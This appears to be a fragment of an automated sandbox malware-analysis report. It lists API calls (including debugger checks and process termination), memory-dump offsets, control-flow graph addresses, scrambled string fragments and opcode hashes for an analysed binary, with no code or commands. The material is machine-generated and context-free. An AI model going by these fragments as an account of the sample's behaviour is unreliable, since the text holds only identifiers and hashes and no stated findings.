                                                                    • _free.LIBCMT ref: 6CDE31F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: _free$EnvironmentStrings$Free
                                                                    • String ID:
                                                                    • API String ID: 2490078468-0
                                                                    • Opcode ID: fc4f19ec0946e51e28e95efbcc0053540c151e3e79cee4100dce803d788d9f7f
                                                                    • Instruction ID: 79b636f0abcc39350000f75cb85a7142f7c4f4ed87969fcff775b7bc5bd237ce
                                                                    • Opcode Fuzzy Hash: fc4f19ec0946e51e28e95efbcc0053540c151e3e79cee4100dce803d788d9f7f
                                                                    • Instruction Fuzzy Hash: E4E02B63A4884049D2111B3E6C016AE22200F8B33DF15832FD824CBAF0EF60890B01B9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1899 8af670-8af6c1 call 88a220 1902 8af6d0-8af700 1899->1902 1902->1902 1903 8af702-8af743 1902->1903 1904 8af750-8af7af 1903->1904 1904->1904 1905 8af7b1-8af8d5 1904->1905 1906 8af8e0-8af913 1905->1906 1906->1906 1907 8af915-8af921 1906->1907 1908 8af93b-8af945 1907->1908 1909 8af923-8af92f 1907->1909 1911 8af95d 1908->1911 1912 8af947-8af94a 1908->1912 1910 8af930-8af939 1909->1910 1910->1908 1910->1910 1914 8af95f-8af96d 1911->1914 1913 8af950-8af959 1912->1913 1913->1913 1915 8af95b 1913->1915 1916 8af96f-8af977 1914->1916 1917 8af98d 1914->1917 1915->1914 1919 8af980-8af989 1916->1919 1918 8af98f-8af99c 1917->1918 1920 8af9ab-8af9b7 1918->1920 1921 8af99e-8af99f 1918->1921 1919->1919 1922 8af98b 1919->1922 1924 8af9cb-8af9fd call 8c36a0 1920->1924 1925 8af9b9-8af9bf 1920->1925 1923 8af9a0-8af9a9 1921->1923 1922->1918 1923->1920 1923->1923 1926 8af9c0-8af9c9 1925->1926 1926->1924 1926->1926
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                    • Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_860000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *&?$$3HcP$7()&$8,11$:&Dl$<G24$=.dA$KKPV$O'TT$WDHZ$y_~)$zaB
                                                                    • API String ID: 0-2264557016
                                                                    • Opcode ID: 96ec30c3c7abe553a22243ae5477057a4866f16f58f8429009d8daf36cdd3193
                                                                    • Instruction ID: ddb3ed68d1bb2f04fd8a55c9378fee9c2ddbd8ecfd514ad7a5fdbb38a7d9a65f
                                                                    • Opcode Fuzzy Hash: 96ec30c3c7abe553a22243ae5477057a4866f16f58f8429009d8daf36cdd3193
                                                                    • Instruction Fuzzy Hash: CA91B2B0204B818BE325CF3985917A3BFE1EB97304F19896DD5EB8B792D7346406CB51
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                    • Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_860000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2zS$C$HI$Q:$R[$\$dW$e]
                                                                    • API String ID: 0-720759029
                                                                    • Opcode ID: 2e2ffb56de76aa475517feb11019d0694e79c0badc04c9632dba6be4cbb34f4d
                                                                    • Instruction ID: de5956110c03fa29b65e06c4a2ea819640212ba883d4f7fa8ddbfb1ccbb96fc9
                                                                    • Opcode Fuzzy Hash: 2e2ffb56de76aa475517feb11019d0694e79c0badc04c9632dba6be4cbb34f4d
                                                                    • Instruction Fuzzy Hash: 68E1EAB5A08300ABE7109F24DC85B9BBBA4FF86714F14892CF695DB391D3B5D805CB92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                    • Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_860000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %(Hy$&6<$'HLJ$MKB$O($a$pRQK
                                                                    • API String ID: 0-3891484782
                                                                    • Opcode ID: aa82ce53f169c3d06775f6c6747d11f23c6837c8e0fc1a2ea40f5dc1f3f18214
                                                                    • Instruction ID: d92e837a338e4c1b7151df5bb7ba4f3c231857a4a37985fbd09f39980ef269d3
                                                                    • Opcode Fuzzy Hash: aa82ce53f169c3d06775f6c6747d11f23c6837c8e0fc1a2ea40f5dc1f3f18214
                                                                    • Instruction Fuzzy Hash: EB5212B4504B818FD335CF39C890766BBE1FF56314B188A6DE4E68BB92C735A906CB50
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CDE1616
                                                                    • IsDebuggerPresent.KERNEL32 ref: 6CDE16E2
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CDE1702
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 6CDE170C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: d8a89335cbe690ace807de1b4c3888f36714fd1331c504d742d3937683fd4a71
                                                                    • Instruction ID: 626930d2b0dfe363716cd5f5acb83ea0043b222aed634ed088cbfafed4e34314
                                                                    • Opcode Fuzzy Hash: d8a89335cbe690ace807de1b4c3888f36714fd1331c504d742d3937683fd4a71
                                                                    • Instruction Fuzzy Hash: 6E3129B5E05318DBDB10EF65D9897CCBBB8AF08304F10419AE408A7250EB709A85CF14
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8Bs*$h$6p
                                                                    • API String ID: 0-2078908071
                                                                    • Opcode ID: 2a2ab5ddac38b51f388266317e875239588c3de7c02838ba22fa4d0360855ca6
                                                                    • Instruction ID: 7b6fd2440f2789ebb2670c55d47e682d0471aad1f6c93516797cbddc23707171
                                                                    • Opcode Fuzzy Hash: 2a2ab5ddac38b51f388266317e875239588c3de7c02838ba22fa4d0360855ca6
                                                                    • Instruction Fuzzy Hash: FB92F536E446458FCF088FBCD5D43CD77F2AB4A3A9F10C115D461EBBA4C92AA80ADB15
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CDE4092
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CDE409C
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CDE40A9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: e80f3fa1f6fc1c2b03da89e00e4062d3a2fe8cb1e88e63f32cc8235ffdd753c5
                                                                    • Instruction ID: 30883f9388db1a9a23ee5b2ac135bae1c96d1205711aa8fca8448a7ad40fe0d0
                                                                    • Opcode Fuzzy Hash: e80f3fa1f6fc1c2b03da89e00e4062d3a2fe8cb1e88e63f32cc8235ffdd753c5
                                                                    • Instruction Fuzzy Hash: E531C474901218EBCB21DF65D9887CCBBB8BF0C314F5042EAE41CA72A0E7709B858F54
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,6CDE2D94,?,00000001,?,?), ref: 6CDE2DB7
                                                                    • TerminateProcess.KERNEL32(00000000,?,6CDE2D94,?,00000001,?,?), ref: 6CDE2DBE
                                                                    • ExitProcess.KERNEL32 ref: 6CDE2DD0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 08a35cdacc2580d163cbee304d3e94774b94659da5838dc010d5e937350e8414
                                                                    • Instruction ID: 494cbf1d4fd0e7b0013f18d172f91ed15ed18028bd845a3f31b7428df7a05c1e
                                                                    • Opcode Fuzzy Hash: 08a35cdacc2580d163cbee304d3e94774b94659da5838dc010d5e937350e8414
                                                                    • Instruction Fuzzy Hash: 68E04631100208FBCF52AF54C80DA993B79EB0A249F000418FA1886A70CB35F992CBA8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @'1$E[Rl$E[Rl
                                                                    • API String ID: 0-3644602742
                                                                    • Opcode ID: a1002e7604209b23b7d3fcdd1179fd21b2a6d8fead6ab9a55b2599a284074ee0
                                                                    • Instruction ID: 7f63a456017e25191d9e5c76ac831fd4cb78f53c0f824bcbd985e420cd02cbca
                                                                    • Opcode Fuzzy Hash: a1002e7604209b23b7d3fcdd1179fd21b2a6d8fead6ab9a55b2599a284074ee0
                                                                    • Instruction Fuzzy Hash: A6226B36E50101CFDF05CE7CDD943DE77F2AB56325F21A21AD821DB7E4C22AA9098B90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                    • Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_860000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #:EX$/:EX$|
                                                                    • API String ID: 0-1498014989
                                                                    • Opcode ID: f641b2e1d107a67fe1cb44df5131b8b3c9f0b50c04125af42b221465f5728ed2
                                                                    • Instruction ID: 4c5b653c9903287addd5dac2ab558cb282f4acf7d5a1213fa5f8abcadb0f2de8
                                                                    • Opcode Fuzzy Hash: f641b2e1d107a67fe1cb44df5131b8b3c9f0b50c04125af42b221465f5728ed2
                                                                    • Instruction Fuzzy Hash: 22511E715183919BCB18DF25C8916ABBBE1FF82344F48996CE8C6DB251E3788901CB92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: qZ
                                                                    • API String ID: 0-1764783552
                                                                    • Opcode ID: c998fa48ce40de6362d513107b132b4dd941d33b773475d920e47b1517e19962
                                                                    • Instruction ID: fe049c2f96ce8e7dc60cb382a103418c72b6eccd3d58f79ac4b56ec2c2041e63
                                                                    • Opcode Fuzzy Hash: c998fa48ce40de6362d513107b132b4dd941d33b773475d920e47b1517e19962
                                                                    • Instruction Fuzzy Hash: F213EB76E402118FCF088F3CC8907CD77F2AB46359F12C559D859EBBA5C63AA94A9F10
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CDEA61C,?,?,00000008,?,?,6CDEA2B4,00000000), ref: 6CDEA84E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 47309c9a35b5a511663e58304d1466a8b1dfc959bd64a769608ef7b665027ecf
                                                                    • Instruction ID: 6e4f9836d5018de04a52e8d3d37eb4a8c73574cb1a656bb76bcbd86d289ada6f
                                                                    • Opcode Fuzzy Hash: 47309c9a35b5a511663e58304d1466a8b1dfc959bd64a769608ef7b665027ecf
                                                                    • Instruction Fuzzy Hash: E3B1343561060ACFD705DF28C486B95BFB0FF49368F258658E8A9CF6A1C335E982CB40
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CDE17EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    • Opcode ID: 5e6578641ddbe52f9509cad09eb4f7552ce901c42bfb4ae33508515793646668
                                                                    • Instruction ID: a04a979d8455edaa4d0fdffff5c0d8bf2f8eb6ecfa9d6991aa0ad7a9857f0c1a
                                                                    • Opcode Fuzzy Hash: 5e6578641ddbe52f9509cad09eb4f7552ce901c42bfb4ae33508515793646668
                                                                    • Instruction Fuzzy Hash: 66517DB1F12605DBEB15CF56D88179ABBF0FB88314F20846AC529EB252D375E904CF50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                    • Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_860000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5|iL
                                                                    • API String ID: 0-1880071150
                                                                    • Opcode ID: 016b9a2f7386b01bb02a0f41aaf442b213601f7d4f392b77bc51e00d59fd8080
                                                                    • Instruction ID: 7d69f19ab3c1c6869b778fc3433a32bab63a49af89fc5093083bfc0d7f358b29
                                                                    • Opcode Fuzzy Hash: 016b9a2f7386b01bb02a0f41aaf442b213601f7d4f392b77bc51e00d59fd8080
                                                                    • Instruction Fuzzy Hash: A2711631A082419BDB188F2CDC916ABB7D1FB95324F19C67DE9D5C73A2E7709C048786
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                    • Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_860000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 21586ac75f6ee9d420c2f888ddf1f8ad857b7154f4649b721990310c9634cdfb
                                                                    • Instruction ID: c818968e16e1605c0d9de8b56f41a33bbe2b64bb6e9923865622e350817d8828
                                                                    • Opcode Fuzzy Hash: 21586ac75f6ee9d420c2f888ddf1f8ad857b7154f4649b721990310c9634cdfb
                                                                    • Instruction Fuzzy Hash: 3B4100B69052118BD718DF24D821B2BB3B2FFD1328F15852CE486CB391E735D909C782
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                    • Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_860000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @
                                                                    • API String ID: 0-2766056989
                                                                    • Opcode ID: 6f0e467e03569edbc09609ff50d5c475ee457ef8ec1b87c741a90d483101c77e
                                                                    • Instruction ID: 8f854601d415f53b57bebf548aa63a6d79a8f25d9aef74bc92c34ff2103b2f24
                                                                    • Opcode Fuzzy Hash: 6f0e467e03569edbc09609ff50d5c475ee457ef8ec1b87c741a90d483101c77e
                                                                    • Instruction Fuzzy Hash: 6B312F755083049FC310EF68C8D0A6BBBF5FF99364F14982CEA94872A1D375D948CB9A
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 690f2ab2b671d311171d088b2819b978b5344dd1fa3b477083833ec02a345c60
                                                                    • Instruction ID: 9bddadee86251fb44889b2b7ab50a87dff572f302cf4361afaa33a48e5e0f837
                                                                    • Opcode Fuzzy Hash: 690f2ab2b671d311171d088b2819b978b5344dd1fa3b477083833ec02a345c60
                                                                    • Instruction Fuzzy Hash: CEA012303002008B9F804E30424460936B8571619030840255400C4040D66050A15641
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                    • Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_860000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 03ae6a2c336755e2ba6070672ac64e64af8c47685f894fba98d150027eae7a79
                                                                    • Instruction ID: 816e0a3488f5171fd05275482511d86317c5f448ff1cf764777286b1ba1c3c68
                                                                    • Opcode Fuzzy Hash: 03ae6a2c336755e2ba6070672ac64e64af8c47685f894fba98d150027eae7a79
                                                                    • Instruction Fuzzy Hash: C8624BB0508BC08ED3328B3D8885797BFD5AB5A324F084A9DD0FA877D2C3B96505C766
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                    • Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_860000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6ed931de4ee897c55c21a0dcfadd7cb1f1ecbdb017de52a216f578b1882065cb
                                                                    • Instruction ID: 42eed48d89b794274125592da469c3c64c3c9d185d5ef6a1a05afe3fef441089
                                                                    • Opcode Fuzzy Hash: 6ed931de4ee897c55c21a0dcfadd7cb1f1ecbdb017de52a216f578b1882065cb
                                                                    • Instruction Fuzzy Hash: CB910632A042615FD726CE2C885066ABB91FB96324F19C67DE8B9CB7D2D670CC46C7C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                    • Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_860000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d263c32f197d2c43102edde97da817967896f4bd7a42d44af63fb3db36c0667b
                                                                    • Instruction ID: 7b2c9af98381f3e037e2adf9b0c77e8721bbf1f0c1ddf2016db455d4abbb4753
                                                                    • Opcode Fuzzy Hash: d263c32f197d2c43102edde97da817967896f4bd7a42d44af63fb3db36c0667b
                                                                    • Instruction Fuzzy Hash: 06B10175E086888FDB14CBACC4513EEBBE1FB9A310F18846DD492D7392C77988058B56
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                    • Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_860000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 45495a81ccf2cb6ceb8cbbf53310ecb24454d21ce8d9c6117b96b0468ddfcfb9
                                                                    • Instruction ID: 42466e42675596c39987f616eda9ad776a7b9d01c617bf8c0b5eba89936f78ed
                                                                    • Opcode Fuzzy Hash: 45495a81ccf2cb6ceb8cbbf53310ecb24454d21ce8d9c6117b96b0468ddfcfb9
                                                                    • Instruction Fuzzy Hash: 14515BB15087548FE314DF29D49439BBBE1FB84318F044E2DE5E987351E379DA088B82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1952435852.0000000000862000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                    • Associated: 00000000.00000002.1952386794.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1952507608.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_860000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 264725778cb1bb67cd01e1c22dc5135cdcadfbb74274775da8d17485ef73deb4
                                                                    • Instruction ID: 2f82cdb14907e052c51202a1008a789231f57cf6c9f0dea560cd333d97d41c5a
                                                                    • Opcode Fuzzy Hash: 264725778cb1bb67cd01e1c22dc5135cdcadfbb74274775da8d17485ef73deb4
                                                                    • Instruction Fuzzy Hash: 843146B29153059ADB14AF28C842623B3F5FFA1364F1D9528E899CB2C1FF788900C396
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
